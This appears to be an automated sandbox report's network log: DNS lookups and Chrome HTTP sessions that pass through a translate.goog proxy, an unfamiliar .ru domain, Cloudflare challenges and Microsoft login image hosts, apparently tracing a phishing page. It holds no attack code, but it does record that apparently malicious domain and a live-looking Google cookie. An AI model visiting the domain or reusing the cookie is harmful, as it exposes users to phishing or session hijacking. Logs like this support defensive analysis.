                                                                                                                                                              Jan 17, 2024 17:39:30.932857037 CET192.168.2.41.1.1.10x7595Standard query (0)2r1.nhvw4is.ru65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:34.704862118 CET192.168.2.41.1.1.10x4af8Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:34.705019951 CET192.168.2.41.1.1.10x10e4Standard query (0)aadcdn.msauthimages.net65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:35.336842060 CET192.168.2.41.1.1.10x3cd7Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:35.337032080 CET192.168.2.41.1.1.10x8335Standard query (0)aadcdn.msauthimages.net65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:40:27.437604904 CET192.168.2.41.1.1.10x90d2Standard query (0)clients1.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:40:27.438174009 CET192.168.2.41.1.1.10x1e62Standard query (0)clients1.google.com65IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Jan 17, 2024 17:38:58.191220999 CET1.1.1.1192.168.2.40xb3a6No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.191220999 CET1.1.1.1192.168.2.40xb3a6No error (0)clients.l.google.com142.250.65.238A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.191487074 CET1.1.1.1192.168.2.40x1365No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.191688061 CET1.1.1.1192.168.2.40xfe11No error (0)accounts.google.com172.253.122.84A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.201025963 CET1.1.1.1192.168.2.40xe211No error (0)cascade-madmimi-com.translate.goog142.251.40.161A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.994399071 CET1.1.1.1192.168.2.40x1b1No error (0)cascade-madmimi-com.translate.goog142.250.65.193A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:00.896409988 CET1.1.1.1192.168.2.40xf11fNo error (0)2r1.nhvw4is.ru65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:01.193749905 CET1.1.1.1192.168.2.40xe40dNo error (0)2r1.nhvw4is.ru172.67.148.131A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:01.193749905 CET1.1.1.1192.168.2.40xe40dNo error (0)2r1.nhvw4is.ru104.21.29.62A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.479775906 CET1.1.1.1192.168.2.40x60d9No error (0)www.google.com142.251.40.196A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.480676889 CET1.1.1.1192.168.2.40xace6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.604626894 CET1.1.1.1192.168.2.40x8394No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.604626894 CET1.1.1.1192.168.2.40x8394No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.604857922 CET1.1.1.1192.168.2.40x17daNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.607269049 CET1.1.1.1192.168.2.40x7601No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.607269049 CET1.1.1.1192.168.2.40x7601No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.607269049 CET1.1.1.1192.168.2.40x7601No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.607269049 CET1.1.1.1192.168.2.40x7601No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.607269049 CET1.1.1.1192.168.2.40x7601No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.608275890 CET1.1.1.1192.168.2.40xc9deNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:03.921634912 CET1.1.1.1192.168.2.40x580fNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:03.921634912 CET1.1.1.1192.168.2.40x580fNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:03.923578024 CET1.1.1.1192.168.2.40x2885No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:04.986287117 CET1.1.1.1192.168.2.40x357dNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:04.986287117 CET1.1.1.1192.168.2.40x357dNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:04.987078905 CET1.1.1.1192.168.2.40xe995No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:06.943078041 CET1.1.1.1192.168.2.40x312dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:31.289622068 CET1.1.1.1192.168.2.40xb9baNo error (0)2r1.nhvw4is.ru172.67.148.131A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:31.289622068 CET1.1.1.1192.168.2.40xb9baNo error (0)2r1.nhvw4is.ru104.21.29.62A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:31.289722919 CET1.1.1.1192.168.2.40x7595No error (0)2r1.nhvw4is.ru65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:34.792994976 CET1.1.1.1192.168.2.40x4af8No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:34.792994976 CET1.1.1.1192.168.2.40x4af8No error (0)cs1025.wpc.upsiloncdn.net152.199.4.73A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:34.793433905 CET1.1.1.1192.168.2.40x10e4No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:35.424701929 CET1.1.1.1192.168.2.40x3cd7No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:35.424701929 CET1.1.1.1192.168.2.40x3cd7No error (0)cs1025.wpc.upsiloncdn.net152.199.4.73A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:35.425626040 CET1.1.1.1192.168.2.40x8335No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:40:27.525094032 CET1.1.1.1192.168.2.40x90d2No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:40:27.525094032 CET1.1.1.1192.168.2.40x90d2No error (0)clients.l.google.com142.250.81.238A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:40:27.527015924 CET1.1.1.1192.168.2.40x1e62No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              • clients2.google.com
                                                                                                                                                              • accounts.google.com
                                                                                                                                                              • cascade-madmimi-com.translate.goog
                                                                                                                                                              • 2r1.nhvw4is.ru
                                                                                                                                                              • https:
                                                                                                                                                                • challenges.cloudflare.com
                                                                                                                                                                • cdn.jsdelivr.net
                                                                                                                                                                • aadcdn.msauthimages.net
                                                                                                                                                              • fs.microsoft.com
                                                                                                                                                              • a.nel.cloudflare.com
                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                              • clients1.google.com
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.449731142.250.65.2384434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:38:58 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                              Host: clients2.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              X-Goog-Update-Interactivity: fg
                                                                                                                                                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                              X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:38:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lVc_wpI4ctoXJ5RcBQ0B8A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:38:58 GMT
                                                                                                                                                              Content-Type: text/xml; charset=UTF-8
                                                                                                                                                              X-Daynum: 6225
                                                                                                                                                              X-Daystart: 31138
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              Server: GSE
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2024-01-17 16:38:58 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 32 35 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 31 31 33 38 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                              Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6225" elapsed_seconds="31138"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                              2024-01-17 16:38:58 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                              Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                              2024-01-17 16:38:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.449730172.253.122.844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:38:58 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                              Host: accounts.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 1
                                                                                                                                                              Origin: https://www.google.com
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
                                                                                                                                                              2024-01-17 16:38:58 UTC1OUTData Raw: 20
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2024-01-17 16:38:58 UTC1627INHTTP/1.1 200 OK
                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                              Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:38:58 GMT
                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mM203nlE5zCqS1XwCUBXXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                              Server: ESF
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2024-01-17 16:38:58 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                              Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                              2024-01-17 16:38:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.449732142.251.40.1614434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:38:58 UTC612OUTGET /logos/0028/7193/logox_0.png?EmnBtwANKGaTAXRVsmKicbCmMa HTTP/1.1
                                                                                                                                                              Host: cascade-madmimi-com.translate.goog
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:38:58 UTC707INHTTP/1.1 200 OK
                                                                                                                                                              Last-Modified: Sat, 02 Sep 2023 10:34:50 GMT
                                                                                                                                                              x-robots-tag: none
                                                                                                                                                              Content-Security-Policy: frame-ancestors *.translate.goog
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                              Cross-Origin-Opener-Policy: unsafe-none
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:38:58 GMT
                                                                                                                                                              Server: ESF
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Set-Cookie: CONSENT=PENDING+897; expires=Fri, 16-Jan-2026 16:38:58 GMT; path=/; domain=.translate.goog; Secure
                                                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Expires: Wed, 17 Jan 2024 16:38:58 GMT
                                                                                                                                                              Cache-Control: private
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-01-17 16:38:58 UTC545INData Raw: 64 30 33 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e2 00 00 00 30 08 06 00 00 00 0c e6 a6 f3 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 0c bd 49 44 41 54 78 01 ed 9c 3d 77 1b b9 15 86 47 b6 7a d3 bf c0 4c ca 34 66 4e d2 6b 5c 64 53 9a ee b3 c7 a3 5f 60 fa ab 8d a8 da 1f d2 fe 02 8f 72 d2 9b ee b2 95 c9 7e cf 46 aa dc 65 a9 5f b0 52 5a 7f 30 cf 4b 03 5c 0c 06 43 42 12 87 de 8d 31 e7 8c 81 7b 71 71 2f e6 05 5e 7c 0c 47 de fa 6f ff f7 b3 ac 85 0b a7 3f de 18 fd e7 4f 72 fd f7 ef b3 1f b6 b6 b2 79 7e dd a1 f6 ff 92 5d cb b6 b2 56 9e 61 dd 6d 4d fe 12 02 4d 08 5c 6b 2a 48 fa 84 40 42 60 73 08 24 22 6e 0e eb 14 29 21 d0 88 40 22 62 23 34 a9 20 21 b0 39 04 12 11 37 87 75 8a 94 10 68 44 20 11 b1 11 9a 54 90 10 d8 1c 02 89 88 9b c3 3a 45 4a
                                                                                                                                                              Data Ascii: d03PNGIHDR0sRGBIDATx=wGzL4fNk\dS_`r~Fe_RZ0K\CB1{qq/^|Go?Ory~]VamMM\k*H@B`s$"n)!@"b#4 !97uhD T:EJ
                                                                                                                                                              2024-01-17 16:38:58 UTC1252INData Raw: 18 a3 0f 1f 3e 4c 59 41 6b e6 5a 99 6b ca a4 f8 62 08 98 5d 4e 25 3e 7d 34 61 87 d3 0f ed 9e 34 21 53 e7 2e 15 74 dc d0 64 db e1 be 83 3c ad 38 41 48 2b a2 8f c8 2f 72 ef e9 d3 a7 bd 5f c4 f8 9c 21 71 74 05 3a 71 8a b1 66 52 f7 3a a7 83 4b 57 91 f2 5f 16 01 c8 54 1b 0f f4 35 dd 17 3e c2 30 21 8f 68 71 c9 bd 72 62 4e 44 5c d2 b7 10 a1 58 52 1c 2c 32 e4 ad 75 58 d0 d8 51 f2 62 a6 a0 a3 77 51 1d 91 ee f3 0a bc 67 08 ea 58 a5 ec 17 46 e0 b6 1f 9f 7e 1a fb ba cb c8 69 6b 5a 45 ed 1c f1 86 55 41 08 9d f3 06 56 8e 49 21 ef 85 ec 5d 9f e6 4d 6d e9 ea 52 fe d7 83 80 b6 96 7e 6b 9a 56 43 df 6e 95 9c 56 c4 2a 42 23 57 14 f0 bc aa 2e 5c dd b2 bc 79 49 a3 33 c1 e2 82 cc 93 85 90 32 09 81 06 04 d2 8a e8 00 c3 36 63 c8 e1 ba f2 b6 13 32 4a 2e 1d b3 c6 2c 67 82 c2 9b 35
                                                                                                                                                              Data Ascii: >LYAkZkb]N%>}4a4!S.td<8AH+/r_!qt:qfR:KW_T5>0!hqrbND\XR,2uXQbwQgXF~ikZEUAVI!]MmR~kVCnV*B#W.\yI326c2J.,g5
                                                                                                                                                              2024-01-17 16:38:58 UTC1252INData Raw: c9 a8 ef 1b 44 3c cf 9c d4 d8 0d fd ba c8 79 40 d7 9a 6a 3b fb e7 cf 3f b4 e4 fd 5d f6 b7 9b f3 95 70 f6 af ec 1f 6c 4c ff d0 46 9c ad bf 66 7f 6e c3 af 56 11 48 a6 19 71 31 53 92 7f c0 2d dd e2 a2 13 0b 88 e8 ca 7a 49 33 5d 28 d6 94 61 e6 d6 b6 b0 eb b9 bb f2 df 4d 7a fe 46 9e bc 10 1b e2 67 17 58 6d e5 bb b2 ea f1 3c 39 ba 92 3b 23 3f 25 a9 6c e3 d0 1d 40 c6 db 4c 6c fb 11 98 e6 d4 f7 af d2 57 84 64 fc 8f 58 15 0f bc b2 4a 5b bc b2 b5 8b fa 1d b1 95 ff 81 bb 72 26 fc 4c c2 56 e2 cc 38 7b c2 83 d9 da 91 f9 ec b0 24 11 f9 e6 17 81 ba da 02 d9 ad 9a 19 9c 77 6d b9 52 6c 4a 57 5e 57 9e 81 d2 0b f8 1a 07 74 97 56 b1 42 1d 37 55 e6 77 c4 2e 93 4e a5 58 2b 4e 45 b1 44 c0 f7 18 fb 3d d7 04 b9 6b 65 56 b4 da c7 14 2a 03 cf 42 67 45 26 45 9d e5 be 0b 9d af 8c 5d
                                                                                                                                                              Data Ascii: D<y@j;?]plLFfnVHq1S-zI3](aMzFgXm<9;#?%l@LlWdXJ[r&LV8{$wmRlJW^WtVB7Uw.NX+NED=keV*BgE&E]
                                                                                                                                                              2024-01-17 16:38:58 UTC289INData Raw: 3a 3a c3 54 f4 74 e2 34 60 37 57 69 c0 91 29 78 11 31 c4 5f 4e be cf dd e1 5e 5c b4 6f 2a 9f 3c e7 d8 cc ce 8b 32 32 17 8a e7 56 54 de 8b af d8 39 77 87 98 3d d2 8c b8 c7 4a b9 b4 3d 1b db ef 73 3f ab ea ff 42 82 0e 5b d1 b9 1f ea ca 87 7c dd 26 3d 45 9e 1a ac c7 90 6c 54 af 5d d7 18 a2 96 c6 a7 88 d9 c5 6a ee 93 fc 09 f9 33 eb 73 c9 e4 50 71 4c bd fd 8a 22 42 30 38 f5 cd 39 57 ed d0 b3 cd 2f e2 cf fb 47 c2 16 7f 7d 11 dc 80 7f 36 bd c2 bf 33 fe e0 f8 db 9b f3 0f bd 67 df 67 fa 0b 8f 56 3e fa ce be c9 ae b5 f8 d1 f7 15 00 48 55 13 02 f1 08 a4 ad 69 3c 56 c9 32 21 d0 1a 02 89 88 ad 41 9b 1c 27 04 e2 11 48 44 8c c7 2a 59 26 04 5a 43 20 11 b1 35 68 93 e3 84 40 3c 02 89 88 f1 58 25 cb 84 40 6b 08 24 22 b6 06 6d 72 9c 10 88 47 20 11 31 1e ab 64 99 10 68 0d 81
                                                                                                                                                              Data Ascii: ::Tt4`7Wi)x1_N^\o*<22VT9w=J=s?B[|&=ElT]j3sPqL"B089W/G}63ggV>HUi<V2!A'HD*Y&ZC 5h@<X%@k$"mrG 1dh
                                                                                                                                                              2024-01-17 16:38:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.449736142.250.65.1934434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:38:59 UTC412OUTGET /logos/0028/7193/logox_0.png?EmnBtwANKGaTAXRVsmKicbCmMa HTTP/1.1
                                                                                                                                                              Host: cascade-madmimi-com.translate.goog
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:38:59 UTC707INHTTP/1.1 200 OK
                                                                                                                                                              Last-Modified: Sat, 02 Sep 2023 10:34:50 GMT
                                                                                                                                                              x-robots-tag: none
                                                                                                                                                              Content-Security-Policy: frame-ancestors *.translate.goog
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                              Cross-Origin-Opener-Policy: unsafe-none
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:38:59 GMT
                                                                                                                                                              Server: ESF
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Set-Cookie: CONSENT=PENDING+423; expires=Fri, 16-Jan-2026 16:38:59 GMT; path=/; domain=.translate.goog; Secure
                                                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Expires: Wed, 17 Jan 2024 16:38:59 GMT
                                                                                                                                                              Cache-Control: private
                                                                                                                                                              Connection: close
